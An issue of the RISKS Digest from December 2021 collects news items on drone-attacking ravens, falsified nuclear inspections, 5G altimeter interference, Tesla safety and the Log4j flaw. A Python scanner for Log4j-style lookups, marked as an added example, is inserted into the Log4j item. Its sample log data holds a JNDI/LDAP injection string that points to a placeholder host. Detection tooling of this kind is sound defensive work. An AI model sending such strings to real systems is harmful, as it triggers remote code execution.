The RISKS Digest
Volume 32 Issue 96

Tuesday, 28th December 2021

Forum on Risks to the Public in Computers and Related Systems

ACM Committee on Computers and Public Policy, Peter G. Neumann, moderator


Contents

Wing Resumes Drone Deliveries in Canberra After Raven Attacks Forced Pause During Nesting Season
ABC Australia
The human factor fails and is caught in U.S. nuclear plant inspections
NBC12
The CIA Is Deep Into Cryptocurrency, Director Reveals
Vice
U.S. FAA Issues Draft Airworthiness Directives Highlighting impact of 5G on Radar Altimeters
FAA
AWS us-east-1 outage brings down services around the world
DatacenterDynamics
Google finally knows which app to blame for Android's mysterious can't-call-911 bug
Android Police
‘The Beatles: Get Back’ shows that deepfake tech isn't always evil
ZDNet
Inside Tesla as Elon Musk Pushed an Unflinching Vision for Self-Driving Cars
NYTimes
A New Tesla Safety Concern: Drivers Can Play Video Games in Moving Cars
NYTimes
log4j
collected from Dan Goodin and others
A $92,000 flying car can reach speeds of 63 miles per hour
Business Insider
Researchers unveil new cyber-protections against “logic bombs”
techxplore
Researchers Made a Camera That's the Size of a Grain of Salt
Vice
A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution
Google Project Zero
Twitter Spaces is being used by the Taliban and white nationalists
WashPost
Next year's Android smartphones will be watching you
The Verge
Re: Australia's AI Cameras Catch Over 270,000 Drivers Using Phones
Nic Fulton
Info on RISKS (comp.risks)

Wing Resumes Drone Deliveries in Canberra After Raven Attacks Forced Pause During Nesting Season (ABC Australia)

ACM TechNews <technews-editor@acm.org>
Wed, 15 Dec 2021 12:28:01 -0500 (EST)

Markus Mannheim, ABC News Australia 10 Dec 2021 via ACM TechNews, Wednesday, December 15, 2021

Alphabet's Wing subsidiary has relaunched drone-based coffee and fast food deliveries to the Harrison suburb of Canberra, Australia, following the service's suspension in September due to attacks by nesting ravens. Ornithologist Neil Hermes discovered a pair of ravens had a nest with three chicks in a tree near a Wing customer; the ravens were approaching the drones from behind, as they would if the drone were a predator and they were trying to encourage it to leave. The service restarted after the chicks had fledged (grown wing feathers large enough for flight). Said Hermes, “We certainly need to be careful to ensure that we're aware of the impacts [of what we're doing].” https://orange.hosting.lsoft.com/trk/click?ref=znwrbbrs9_6-2d9e6x230174x072181&


The human factor fails and is caught in U.S. nuclear plant inspections (NBC12)

“Rob Wilcox” <robwilcoxjr@gmail.com>
Mon, 13 Dec 2021 17:08:24 -0800

https://www.nbc12.com/2021/12/13/former-inspector-virginia-nuclear-plant-pleads-guilty-falsifying-inspection-reports/

Former inspector of Virginia nuclear plant pleads guilty of falsifying inspection reports

NBC12 Newsroom, 13 Dec 2021

LOUISA Co., Va. (WWBT) - The former senior resident inspector of the North Anna Nuclear Power Station pleaded guilty to making false statements on inspection reports.

Sixty-year-old Gregory Croon of Tennessee worked for the U.S. Nuclear Regulatory Commission (NRC) and was working at the North Anna plant between 2016 and 2018.

On Monday, Croon pleaded guilty to falsifying inspection reports in federal court.

“The accuracy of NRC inspection reports is critical to the NRC's oversight of licensees' safe operation of nuclear power plants around the nation,” said NRC Inspector General Robert J. Feitel. “Croon's false statements could have jeopardized that safety oversight function.”

Federal officials did not say if there were any short or long-term safety concerns following the investigation, only that the false reports could have jeopardized the safety oversight of the plant.

“The combined efforts of the NRC OIG special agents and our law enforcement partners yielded an appropriate and just result in this case. Nonetheless, it is vital to remember that we must all remain vigilant, watch for fraudulent activity, and report it promptly,”

Croon will be sentenced in March.


The CIA Is Deep Into Cryptocurrency, Director Reveals (Vice)

geoff goodfellow <geoff@iconia.com>
Tue, 7 Dec 2021 12:14:59 -1000

CIA Director William Burns said the agency has “a number of different projects focused on cryptocurrency” on the go.

There's a long-running conspiracy theory among a small number of cryptocurrency enthusiasts that Bitcoin's anonymous inventor, Satoshi Nakamoto, was actually the CIA or another three-lettered agency. That fringe theory is having a fresh day in the sun after CIA Director William Burns said on Monday that the intelligence agency has “a number of different projects focused on cryptocurrency” on the go.

Burns made his comments at the tail end of a talk at the Wall Street Journal's CEO Summit. After discussing everything from the possible Russian invasion of Ukraine to the challenges of space, someone in the audience asked if the agency is on top of cryptocurrencies, which are currently at the center of the ransomware epidemic that U.S. officials are attempting to get a handle on and stamp out. Here's what Burns said: <https://www.wsj.com/video/events/cia-director-on-today-global-challenges/C60765B3-8C1C-495F-8094-99E64C6637A5.html>

“This is something I inherited. My predecessor had started this, but had set in motion a number of different projects focused on cryptocurrency and trying to look at second- and third-order consequences as well and helping with our colleagues in other parts of the U.S. government to provide solid intelligence on what we're seeing as well.”

This is hardly surprising given the focus ransomware is getting from every corner of government. This year, a ransomware attack targeting a pipeline company led to a shutdown, panic buying, and a gas shortage in several states. <https://www.vice.com/en/article/dyvpyw/everything-you-need-to-know-about-the-pipeline-hack>

Cryptocurrencies “could have enormous impact on everything from ransomware attacks, as you mentioned, because one of the ways of getting at ransomware attacks and deterring them is to be able to get at the financial networks that so many of those criminal networks use and that gets right at the issue of digital currencies as well,” Burns said. […]

https://www.vice.com/en/article/dyp7vw/the-cia-is-deep-into-cryptocurrency-director-reveals


U.S. FAA Issues Draft Airworthiness Directives Highlighting impact of 5G on Radar Altimeters (FAA)

“paul cornish” <paul.a.cornish@googlemail.com>
Wed, 8 Dec 2021 19:50:30 -0000

On 7 Dec 2021 the U.S. Federal Aviation Administration issued draft Airworthiness Directives related to possible interference between 5G telecoms (including 5G handsets) and aircraft radar altimeters.

This AD was prompted by a determination that radio altimeters cannot be relied upon to perform their intended function if they experience interference from wireless broadband operations in the 3.7-3.98 GHz frequency band as used by 5G.

It is based on a world wide task force managed by RTCA. It found that:

  1. The likelihood and severity of radio frequency interference increases for operations at lower altitudes.
  2. That interference could cause the radio altimeter to either become inoperable or present misleading information.

The FAA determined that, at this time, no information has been presented that shows radio altimeters are not susceptible to interference caused by C-Band emissions permitted in the United States. The FAA will examine all airports across the U.S. to identify those with nearby 5G base stations and will issue NOTAMs advising of the issues.

As background, the radio altimeter is more precise than a barometric altimeter and for that reason is used where aircraft height over the ground needs to be precisely measured, such as auto-land or other low altitude or low-viz operations. It also feeds accurate height data to auto-pilot and auto landing systems. So it looks like just when the radar altimeter must be performing at its absolute best (i.e., near the ground) it could be impacted by 5G transmissions which could severely impact the safe flight of the aircraft.

For more info see https://www.faa.gov/newsroom/faa-statement-5g and its attachments. [Also noted by Monty Solomon. PGN]


AWS us-east-1 outage brings down services around the world (DatacenterDynamics)

“Lauren Weinstein” <lauren@vortex.com>
Tue, 7 Dec 2021 10:21:43 -0800

https://www.datacenterdynamics.com/en/news/aws-us-east-1-outage-brings-down-services-around-the-world/


Google finally knows which app to blame for Android's mysterious can't-call-911 bug (Android Police)

“Lauren Weinstein” <lauren@vortex.com>
Wed, 8 Dec 2021 16:15:27 -0800

I think it's very notable that a LANDLINE saved the day. No apps to confuse them. They just work. LW

https://www.androidpolice.com/google-finally-knows-which-app-to-blame-for-androids-mysterious-cant-call-911-bug/


‘The Beatles: Get Back’ shows that deepfake tech isn't always evil (ZDNet)

“Gabe Goldberg” <gabe@gabegold.com>
Wed, 8 Dec 2021 00:11:21 -0500

The machine learning technology used here is very similar (if not identical) to what has been used in the past for deepfakes, making fake video look and sound real. A prime example of this is the Emmy Award-winning demonstration video produced by MIT's Center for Advanced Virtuality, “In Event of Moon Disaster,” which depicts then-president Nixon reading a prepared statement that the Apollo 11 astronauts had perished in a catastrophe. To create it, MIT used Nixon's likeness and speech from television appearances and fed it into a machine learning system to synthesize the audio and video and produce the uncanny film.

The demonstration is a warning that these technologies can be used for nefarious purposes. There are currently efforts underway, such as with the Coalition for Content Provenance and Authenticity (C2PA), to create standards for providing context and history for digital media to prove the authenticity for a particular image or video/audio stream in the future can be established, as it is expected that these technologies will be used much more heavily in the future.

So can this deepfake technology be used for evil? Yes. But if Get Back proves anything, it shows it can be used for “deep restoration” as well. A great deal of vintage content can be repaired in this way, be it original films or archival footage that can make it look brand new again — or the freshest they have ever looked and shown on modern content delivery platforms.

https://www.zdnet.com/article/the-beatles-get-back-shows-that-deepfake-tech-isnt-always-evil/

— Gabriel Goldberg, Computers and Publishing, Inc. gabe@gabegold.com 3401 Silver Maple Place, Falls Church, VA 22042 (703) 204-0433 LinkedIn: http://www.linkedin.com/in/gabegold Twitter: GabeG0


Inside Tesla as Elon Musk Pushed an Unflinching Vision for Self-Driving Cars (NYTimes)

“Gabe Goldberg” <gabe@gabegold.com>
Tue, 7 Dec 2021 01:23:50 -0500

In addition, some who have long worked on autonomous vehicles for other companies — as well as seven former members of the Autopilot team — have questioned Tesla's practice of constant modifications to Autopilot and F.S.D., pushed out to drivers through software updates, saying it can be hazardous because buyers are never quite sure what the system can and cannot do.

https://www.nytimes.com/2021/12/06/technology/tesla-autopilot-elon-musk.html


A New Tesla Safety Concern: Drivers Can Play Video Games in Moving Cars (NYTimes)

“Gabe Goldberg” <gabe@gabegold.com>
Tue, 7 Dec 2021 14:10:10 -0500

The feature raises fresh questions about whether Tesla is compromising safety as it rushes to add new technologies.

Not long after buying a Tesla Model 3 this summer, Vince Patton saw a YouTube clip highlighting a feature that took him by surprise: three video games that can be played on the large touch screen mounted in front of the dashboard — while driving down the road.

“I thought surely that can’t be right,” said Mr. Patton, a retiree in Lake Oswego, Ore.

But in a parking lot, he gave it a try, and he was able to play a solitaire game on the Model 3 while in motion. “I only did it for like five seconds and then turned it off,” he said. “I’m astonished. To me, it just seems inherently dangerous.”

The automaker added the games in an over-the-air software update that was sent to most of its cars this summer. They can be played by a driver or by a passenger in full view of the driver, raising fresh questions about whether Tesla is compromising safety as it rushes to add new technologies and features in its cars.

https://www.nytimes.com/2021/12/07/business/tesla-video-game-driving.html

Tesla, not playing with a full deck…


log4j (collected from Dan Goodin and others)

Peter G Neumann <neumann@csl.sri.com>
Thu, 16 Dec 2021 11:39:31 PST

U.S. Cert:

Security experts around the world raced Friday, Dec. 10, 2021, to patch one of the worst computer vulnerabilities discovered in years, a critical flaw in open-source code widely used across industry and government in cloud services and enterprise software. Cybersecurity experts say users of the online game Minecraft have already exploited it to breach other users by pasting a short message into a chat box.

“I'd be hard-pressed to think of a company that's not at risk,” said Joe Sullivan, chief security officer for Cloudflare, whose online infrastructure protects websites from malicious actors. Untold millions of servers have it installed, and experts said the fallout would not be known for several days.

https://us-cert.cisa.gov/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce

- - - -

Monty Solomon <monty@roscom.com>: Hackers launch over 840,000 attacks through Log4J flaw

https://arstechnica.com/information-technology/2021/12/hackers-launch-over-840000-attacks-through-log4j-flaw/

- - - -

Monty Solomon <monty@roscom.com>: As Log4Shell wreaks havoc, payroll service reports ransomware attack

https://arstechnica.com/information-technology/2021/12/as-log4shell-wreaks-havoc-payroll-service-reports-ransomware-attack/

- - - -

Dan Goodin, Ars Technica, 9 Dec 2021

Zero-day in ubiquitous Log4j tool poses a grave threat to the Internet

Minecraft is the first, but certainly not the last, app known to be affected.

<https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/>

Exploit code has been released for a serious code-execution vulnerability in Log4j, an open source logging utility that's used in countless apps, including those used by large enterprise organizations, several websites reported last Thursday.

Word of the vulnerability first came to light on sites catering to users of Minecraft, the best-selling game of all time. The sites warned that hackers could execute malicious code on servers or clients running the Java version of Minecraft by manipulating log messages, including from things typed in chat messages. The picture became more dire still as Log4j was identified as the source of the vulnerability, and exploit code was discovered posted online.

A big deal

“The Minecraft side seems like a perfect storm, but I suspect we are going to see affected applications and devices continue to be identified for a long time,” HD Moore, founder and CTO of network discovery platform Rumble, said. “This is a big deal for environments tied to older Java runtimes: Web front ends for various network appliances, older application environments using legacy APIs, and Minecraft servers, due to their dependency on older versions for mod compatibility.”

Reports are already surfacing of servers performing Internet-wide scans in attempts to locate vulnerable servers. Log4j is incorporated into a host of popular frameworks, including Apache Struts2, Apache Solr, Apache Druid, and Apache Flink. That means that a dizzying number of third-party apps may also be vulnerable to exploits of the same high severity as those threatening Minecraft users.

At the time this post went live, there wasn't much known about the vulnerability. One of the few early sources providing a tracking number for the vulnerability was GitHub, which said it's CVE-2021-44228. Security firm Cyber Kendra on late Thursday reported a Log4j RCE Zero day being dropped on the Internet and concurred with Moore that “there are currently many popular systems on the market that are affected.”

The Apache Foundation has yet to disclose the vulnerability, and representatives there didn't respond to an email. This Apache page does acknowledge the recent fixing of a serious vulnerability. Moore and other researchers said the Java deserialization bug stems from Log4j making network requests through the JNDI to an LDAP server and executing any code that's returned. The bug is triggered inside of log messages with use of the ${} syntax.

Additional reporting from security firm LunaSec said that Java versions greater than 6u211, 7u201, 8u191, and 11.0.1 are less affected by this attack vector, at least in theory, because the JNDI can't load remote code using LDAP. Hackers may still be able to work around this by leveraging classes already present in the target application. Success would depend on whether there are any dangerous gadgets in the process, meaning newer versions of Java may still prevent code execution but only depending on the specifics of each application.

LunaSec went on to say that cloud services from Steam and Apple iCloud have also been found to be affected. Company researchers also pointed out that a different high-severity vulnerability in struts led to the 2017 compromise of Equifax, which spilled sensitive details for more than 143 million U.S. consumers.

Cyber Kendra said that in November the Alibaba Cloud security team disclosed a vulnerability in Log4j2—the successor to Log4j—that stemmed from recursive analysis functions, which attackers could exploit by constructing malicious requests that triggered remote code execution. The firm strongly urged people to use the latest version of Log4j2 available here.

What it means for Minecraft

The Spigot gaming forum said that Minecraft versions 1.8.8 through the most current 1.18 release are all vulnerable, as did other popular game servers such as Wynncraft. Gaming server and news site Hypixel, meanwhile, urged Minecraft players to take extra care.

“The issue can allow remote access to your computer through the servers you log into,” site representatives wrote. “That means any public server you go onto creates a risk of being hacked.”

Reproducing exploits for this vulnerability in Minecraft isn't straightforward because success depends not only on the Minecraft version running but also on the version of the Java framework the Minecraft app is running on top of. It appears that older Java versions have fewer built-in security protections that make exploits easier. On Friday, Minecraft rolled out a new game version that fixes the vulnerability. “We are aware of recent discussions regarding a public exploitation of a Log4j remote code execution vulnerability affecting various industry-wide Apache products,” Microsoft said in a statement. “We've taken steps to keep our customers safe and protected, which includes rolling out a fix that blocks this issue for Java Edition 1.18.1. Customers who apply the fix are protected.”
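
The article above says the bug is triggered by the ${} syntax inside log messages, with Log4j making JNDI requests to an LDAP server, and mentions recursive analysis of such expressions. As an added example (not from the digest or the quoted article), this defender-side scanner extracts balanced ${...} expressions from lines that record untrusted input and flags JNDI lookups and nested lookups for review; the log lines, host names and function names are constructed for illustration.

```python
"""Flag Log4j-style ${...} lookups in log lines (added example, constructed data)."""
from urllib.parse import urlsplit

# Constructed sample lines standing in for logs that record untrusted input
# (chat text, HTTP headers). Host names use the reserved .invalid TLD.
SAMPLE_LOG = [
    '2021-12-10T09:14:02Z INFO  chat <player1> hello everyone',
    '2021-12-10T09:14:07Z INFO  chat <player2> ${jndi:ldap://ldap.example.invalid:1389/a}',
    '2021-12-10T09:15:31Z WARN  http User-Agent="${outer:${inner:value}}"',
    '2021-12-10T09:16:00Z INFO  config path is ${sys:user.dir} and cost is $5 {approx}',
]


def find_lookups(message):
    """Return every balanced ${...} expression as (depth, body) tuples.

    depth 0 is an outermost expression. Inner expressions are reported before
    the expression that contains them. Unterminated '${' and stray '}' are ignored.
    """
    stack, found = [], []
    i = 0
    while i < len(message):
        if message.startswith("${", i):
            stack.append(i + 2)          # remember where the body starts
            i += 2
        elif message[i] == "}" and stack:
            start = stack.pop()
            found.append((len(stack), message[start:i]))
            i += 1
        else:
            i += 1
    return found


def classify(message):
    """Return findings for one message: JNDI lookups and nested lookups."""
    findings = []
    for _depth, body in find_lookups(message):
        prefix, _, rest = body.partition(":")
        if "${" in body:
            # The effective lookup is only known after inner expressions are
            # resolved, so a literal match on the text is not enough: review it.
            findings.append({"kind": "nested-lookup", "lookup": body,
                             "scheme": None, "target": None})
        elif prefix.strip().lower() == "jndi":
            parts = urlsplit(rest.strip())
            findings.append({"kind": "jndi-lookup", "lookup": body,
                             "scheme": parts.scheme.lower() or None,
                             "target": parts.hostname})
    return findings


def scan(lines):
    """Return (line_number, finding) pairs, 1-indexed, for every flagged lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        for finding in classify(line):
            hits.append((number, finding))
    return hits


if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(f"line {number}: {finding['kind']} "
              f"scheme={finding['scheme']} target={finding['target']} "
              f"expr=${{{finding['lookup']}}}")
```

The hosts it reports can be compared against outbound LDAP connection records for the same period to see whether any flagged expression was actually resolved by a vulnerable logger.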


A $92,000 flying car can reach speeds of 63 miles per hour (Business Insider)

geoff goodfellow <geoff@iconia.com>
Tue, 7 Dec 2021 12:44:52 -1000

If you've always dreamed of flying to work, that dream may very soon be a reality.

If you have $92,000, that is.

Companies are always looking for new market niches, and flying cars are quickly becoming the next big thing.

There are plans for cars that both fly and work on the road and for flying taxis that will aim to form the basis of future travel.

Jetson is one of these companies.

The company aims “to make the skies available for everyone with our safe personal electric aerial vehicle,” according to its website.

The company's first flying car, Jetson One, is already on sale.

Jetson One has a maximum speed of 63mph thanks to its eight electric motors which generate 102 horsepower. The car can run continually for 20 minutes. […]

https://www.businessinsider.com/new-flying-car-goes-63-mph-20-minutes-costs-92000-2021-12


Researchers unveil new cyber-protections against “logic bombs” (techxplore.com)

“Richard Stein” <rmstein@ieee.org>
Sat, 11 Dec 2021 10:17:57 +0800

https://techxplore.com/news/2021-12-unveil-cyber-logic.html

“The researchers looked into Mystique, a new class of attacks on printed objects that leverage emerging 4D printing technology to introduce embedded computer code—or logic bombs—by manipulating the manufacturing process.”

“Mystique enables visually harmless objects to behave maliciously when a logic bomb is triggered by a stimulus such as changes in temperature, moisture, pH or modifications to the materials used initially, potentially causing catastrophic operational failures when they are used.”

4D printing (see https://en.wikipedia.org/wiki/4D_printing) applies 3D printer technology with “ink” (gels, fibers, polymers, etc.) sensitized to adjust their shape or material properties in response to environmental conditions: pH, temperature, stress, humidity, magnetic field, sound level, etc. The “Mystique” class of defects and vulnerabilities might arise in a printed structures such as artificial bone or tissue foundation.

The essay discusses means of Mystique-injected defect detection using CAT scans and material sensors to ensure specified manufactured product outcome before shipping to a customer.

[Trust that neither the inspection verification measures, nor the employees with product release approval, are compromised.]


Researchers Made a Camera That's the Size of a Grain of Salt (Vice)

geoff goodfellow <geoff@iconia.com>
Tue, 7 Dec 2021 12:12:28 -1000

It can take images that are better than existing tech.

A newly-developed camera the size of a grain of salt can take clear, full-color images at the level of cameras that are 500,000 times larger.

Researchers at Princeton University and the University of Washington created a new type of optical system, called a metasurface, to shrink the camera's hardware down to size, and combined this with machine-learning image processing that enables the camera to produce clear images in natural lighting. Previously, micro-cameras could only produce useful images in perfect laboratory settings, according to the researchers <https://engineering.princeton.edu/news/2021/11/29/researchers-shrink-camera-size-salt-grain>. Their work is published in the journal Nature. <https://www.nature.com/articles/s41467-021-26443-0>

Each camera consists of 1.6 million cylindrical posts which interact with light to produce the images. These posts are as small as the human immunodeficiency virus (HIV). The surfaces are made from silicon nitride, a material that makes them compatible with computing microchip manufacturing. This means they'd be cheaper and faster to produce than current full-size camera lenses. […]

https://www.vice.com/en/article/4awxvg/researchers-made-a-camera-thats-the-size-of-a-grain-of-salt


A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution (Google Project Zero)

Monty Solomon <monty@roscom.com>
Wed, 15 Dec 2021 13:33:35 -0500

Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works.

Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we've ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.

https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html


Twitter Spaces is being used by the Taliban and white nationalists (WashPost)

Gabe Goldberg <gabe@gabegold.com>
Mon, 13 Dec 2021 00:56:14 -0500

Employees who complained about the lack of moderation say they were sidelined.

https://www.washingtonpost.com/technology/2021/12/10/twitter-turmoil-spaces/


Next year's Android smartphones will be watching you (The Verge)

geoff goodfellow <geoff@iconia.com>
Tue, 7 Dec 2021 10:46:09 -1000

Qualcomm's new always-on smartphone camera is a potential privacy nightmare

“Your phone's front camera is always securely looking for your face, even if you don't touch it or raise to wake it.” That's how Qualcomm Technologies vice president of product management Judd Heape introduced the company's new always-on camera capabilities <https://youtu.be/3H6tfcZLHfg?t=10758> in the Snapdragon 8 Gen 1 processor set to arrive in top-shelf Android phones early next year. <https://www.theverge.com/2021/11/30/22809687/qualcomm-snapdragon-8-gen-1-chip-smartphone-processor-specs-details>

Depending on who you are, that statement can either be exciting or terrifying. For Qualcomm, it thinks this new feature will enable new use cases, like being able to wake and unlock your phone without having to pick it up or have it instantly lock when it no longer sees your face.

But for those of us with any sense of how modern technology is used to violate our privacy, a camera on our phone that’s always capturing images even when we’re not using it sounds like the stuff of nightmares and has a cost to our privacy that far outweighs any potential convenience benefits.

Qualcomm's main pitch for this feature is for unlocking your phone any time you glance at it, even if it's just sitting on a table or propped up on a stand. You don't need to pick it up or tap the screen or say a voice command — it just unlocks when it sees your face. I can see this being useful if your hands are messy or otherwise occupied (in its presentation, Qualcomm used the example of using it while cooking a recipe to check the next steps). Maybe you’ve got your phone mounted in your car, and you can just glance over at it to see driving directions without having to take your hands off the steering wheel or leave the screen on the entire time.

The company is also spinning it as making your phone more secure by automatically locking the phone when it no longer sees your face or detects someone looking over your shoulder and snooping on your group chat. It can also suppress private information or notifications from popping up if you’re looking at the phone with someone else. Basically, if you're not looking at it, your phone is locked; if it can see you, it will be unlocked. If it can see you and someone else, it can automatically lock the phone or hide private information or notifications from displaying on the screen. […]

https://www.theverge.com/22811740/qualcomm-snapdragon-8-gen-1-always-on-camera-privacy-security-concerns


Re: Australia's AI Cameras Catch Over 270,000 Drivers Using Phones (RISKS-32.95)

Nic Fulton <nicfulton@gmail.com>
Wed, 15 Dec 2021 12:57:11 +1100

> You asked “Is it illegal to use your cell-phone for navigation purposes?
> What is the difference between that and a built-in screen for navigation?”

https://roadsafety.transport.nsw.gov.au/stayingsafe/mobilephones/know-the-rules.html

has the answer.

You have to mount the phone in an approved cradle.

“2. Can I touch my phone if it is in a cradle?

If your phone is secured in a cradle, you can only touch your phone:

I hope this helps. The law is pretty sensible, which is good, I guess.
